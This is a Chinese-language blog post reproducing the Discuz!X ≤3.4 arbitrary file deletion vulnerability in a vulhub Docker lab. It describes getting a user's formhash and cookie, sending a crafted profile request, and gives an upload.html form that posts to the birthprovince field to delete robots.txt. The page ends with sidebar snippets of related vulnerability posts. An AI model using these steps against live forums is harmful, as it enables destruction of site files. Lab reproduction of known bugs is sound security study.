漏洞复现-DiscuzX ≤3.4 任意文件删除漏洞

已于 2022-06-27 16:28:30 修改
阅读量850 收藏 1
点赞数
分类专栏: web安全 漏洞复现 文章标签: 安全
于 2022-05-10 14:01:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59350385/article/details/124686637
版权

一、环境搭建

本次用的是vulhub靶场

执行下列命令部署 Discuz!X 安装环境
docker-compose up -d

安装时,只用修改数据库地址为`db`,其他保持默认即可:

二、漏洞复现

(1)访问`http://your-ip/robots.txt`可见robots.txt是存在的:

(2)注册用户hahaha

(3)在个人设置页面找到自己的formhash

(4)带上自己的Cookie、formhash发送如下数据包

(5)查看个人设置页面的出生地

(6)构造upload.html,写上自己的formhash

<body>
    <form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[formhasg]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>

(7)用浏览器打开该页面,上传一个正常图片。此时脏数据应该已被提取出,漏洞已经利用结束。

再次访问http://your-ip/robots.txt,发现文件成功被删除:

 三、其他

影响版本:Discuz!X ≤3.4

漏洞详情:https://lorexxar.cn/2017/09/30/dz-delete/

_s1mple
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Discuz-DiscuzX-3.4.zip
03-23
Discuz-DiscuzX-3.4源码
Discuz!X ≤3.4 任意文件删除漏洞
EC_Carrot的博客
05-25 359
直接 访问robots.txt,发是存在该文件的,这次目标便是它! 首先随便创个用户,然后在个人设置界面找到自己的formhash与cookie 然后发送如下数据包: POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1 Host: localhost Content-Length: 367 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type:
DiscuzX ≤3.4 任意文件删除漏洞
zizizizizi_的博客
01-17 2741
Discuz!X ≤3.4 任意文件删除漏洞 一、漏洞思路 通过配置个人信息的属性值,删除任意文件 版本 :discuz <= 3.4 二、漏洞 1.安装数据库 2.查看robots文件,发文件存在 3.注册登录,进入设置界面 4.找到formhash值并记录 5.点击保存 ,bp拦截 发送如下 ...
Discuz!X 3.4任意文件删除漏洞
众生度尽,方证菩提
10-05 605
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
利用Vulnhub漏洞 - Discuz!X ≤3.4 任意文件删除漏洞
JiangBuLiu的博客
06-28 3167
Apache SSI 远程命令执行漏洞Vulnhub官方教程漏洞原理漏洞启动环境漏洞FormhashCookie发送数据包 Vulnhub官方教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个...
ComsenzDiscuz-DiscuzX-master最新版本X3.4
08-06
ComsenzDiscuz-DiscuzX-master最新版源代码, Comsenz 核心产品 Discuz! X3.4 正式版
Discuz-DiscuzX-master.zip
06-02
Discuz-DiscuzX
WebIM-for-Discuzx 插件 v5.6
10-08
WebIM for DiscuzX是为DiscuzX社区开发的简单专业的即时消息系统。实DiscuzX社区网站访客、用户与管理员间的即时聊天。 NexTalk采用跨域WebSocket或JSONP,有效避免了Webim对社区站点本身资源占
dz文件cp.php,Discuz!X ≤3.4 任意文件删除漏洞分析
weixin_39692254的博客
04-06 344
作者:LoRexxar’@知道创宇404实验室日期:2017年9月30日0x01 简述Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。2017年9月29日,Discuz!修了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇4...
Firefox 内存破坏漏洞
OSCS开源安全社区
08-25 268
在Firefox 103、Firefox ESR 102.1 和 Firefox ESR 91.12 中存在内存安全漏洞,其中一些错误回显包含敏感信息,攻击者可利用此漏洞执行任意代码。升级Firefox到104、Firefox ESR到102.2、Firefox ESR到91.13 或更高版本。Firefox 是一款网络浏览器。
PHP代码审计 ----- 任意文件读取 & 删除漏洞
qq_62344745的博客
04-19 784
通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件
Discuz!X 3.4 任意文件删除漏洞过程(附python脚本)
weixin_33774883的博客
10-01 408
  今天看下群里在讨论Discuz!X 3.4 任意文件删除漏洞,自己做了一些测试,记录一下过程。结尾附上自己编写的python脚本,自动化实任意文件删除。 具体漏洞,请查看 https://paper.seebug.org/411/ 0x01 环境搭建   到官网下载Discuz 3.4版本,phpstudy 本机搭建,并注册账号。站点根目录新建11...
Discuz 3.x 任意文件删除漏洞
qq_41048303的博客
12-06 2139
Discuz!X ≤3.4 任意文件删除漏洞 1.漏洞环境 执行docker-compose up -d 启动后,访问http://192.168.1.142/install来安装discuz 2.漏洞 访问http://192.168.1.142/robots.txt可见robots.txt是存在的 注册用户hahaha 在个人设置页面找到自己的formhash 带上自己的Cookie、formhash发送如下数据包 查看个人设置页面的出生地 构造upload.ht
74CMS 3.0 任意文件删除漏洞
浅笑996的博客
12-08 586
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧admin目录,在弹出的下拉列表中双...
Discuz漏洞
小小猪的博客
11-30 5304
Discuz漏洞 漏洞描述: Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限。 漏洞影响版本: Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org (注意:支持多语言切换可能会有这个漏洞!) 环境搭建: 这里用安鸾渗透测试实战平台环境 :地址 这里访问robots.txt,发下面有很多路径,访问之
Discuz!X前台任意文件删除漏洞
07-18 265
漏洞背景:Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。 2017年9月29日,Discuz!修了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。 2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到 Wooyun漏洞平台...
CLTPHP 5.8 后台任意文件删除漏洞
weixin_50464560的博客
09-16 853
CLTPHP 5.8 后台任意文件删除漏洞 一、漏洞简介 CLTPHP是基于ThinkPHP5开发,后台采用Layui框架的内容管理系统, 二、漏洞影响 CLTPHP 5.8及之前版本 三、过程 漏洞分析 app/admin/controller/Database.php 第221-248行: public function delSqlFiles() { $batchFlag = input('param.batchFlag', 0, 'intval'); //批量删除 if
dz论坛Discuz_X3.4最新网站漏洞
热门推荐
网站安全专家
07-11 4万+
近期我们sinesafe安全部门审计discuz最新版的时候发配置文件写入导致代码执行的问题。cms安装的时候一般会分为几个步骤去进行,其中有对配置文件config进行写入的步骤,当写入的时候未严格限制传入的参数就存在代码执行问题。源码信息:Discuz_X3.4_GIT_SC_UTF8问题文件: \upload\install\index.php漏洞类型:配置文件写入导致代码执行站点地址:ht...
mayi@mayi-virtual-machine:~/Desktop/cv/libyuv$ make make: *** No targets specified and no makefile found. Stop.
最新发布
12-30
根据提供的引用内容,第一个引用是关于无法连接到https://registry.npmjs.org的问题,第二个引用是关于DiscuzX3QQ登录提醒器的源码下载链接。根据你的问题,你想知道如何在终端中运行make命令。以下是关于如何在终端中运行make命令的解释: 在终端中运行make命令时,需要确保当前目录中存在一个名为Makefile的文件。Makefile是一个包含了编译和链接指令的文本文件,用于告诉make命令如何构建和生成可执行文件。 根据你提供的信息,当前目录中没有找到Makefile文件,因此make命令无法执行。请确保你在正确的目录中,并且该目录中包含了Makefile文件。如果没有Makefile文件,你需要创建一个并定义编译和链接指令。 如果你已经在正确的目录中,并且确保存在Makefile文件,但仍然无法执行make命令,请提供更多的信息,以便我能够更好地帮助你解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值